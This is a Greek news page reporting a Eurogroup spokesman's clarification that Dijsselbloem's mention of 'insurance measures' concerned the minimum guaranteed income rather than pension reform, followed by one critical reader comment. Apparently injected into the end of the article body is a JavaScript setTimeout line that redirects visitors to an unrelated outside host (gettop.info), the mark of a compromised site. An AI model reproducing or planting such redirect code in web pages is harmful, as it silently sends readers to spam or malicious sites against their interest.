Ντάισελμπλουμ: Δεν υπάρχει θέμα ασφαλιστικού στην Ελλάδα

1
10

 

Ο Μισέλ Ρέινς, εκπρόσωπος του προέδρου του Eurogroup, Γερούν Ντάισελμπλουμ, διευκρίνισε σήμερα ότι η αναφορά στο έγγραφο του κ. Ντάισελμπλουμ σε «μέτρα για το ασφαλιστικό», δεν έχει να κάνει με τη μεταρρύθμιση του συνταξιοδοτικού, αλλά με θέματα όπως το ελάχιστο εγγυημένο εισόδημα.

Υπενθυμίζεται ότι στο καθιερωμένο έγγραφο πριν από κάθε Eurogroup που καταθέτει προς την ολλανδική Βουλή ο υπουργός Οικονομικών της χώρας και πρόεδρος του Eurogroup, Γερούν Ντάισελμπλουμ, αναφερόταν μεταξύ άλλων ότι «στο επίκεντρο της δεύτερης αξιολόγησης του ελληνικού προγράμματος αναμένεται να βρεθούν τα μέτρα για το ασφαλιστικό και τη μεταρρύθμιση της αγοράς εργασίας». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

1 ΣΧΟΛΙΟ

  1. Το θέατρο του παραλόγου παίζεται. Όλοι γνωρίζουν πως τα νούμερα για το ασφαλιστικό δεν βγαίνουν κι ότι για να γίνει βιώσιμο απαιτούνται παρεμβάσεις. Κι όμως το αφήνουν για το μέλλον κι αυτό, όπως και όλα τα σοβαρά ζητήματα. Με το δίκιο τους’ έχουν και μια (νέα) διαπλοκή να φτιάξουν!

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here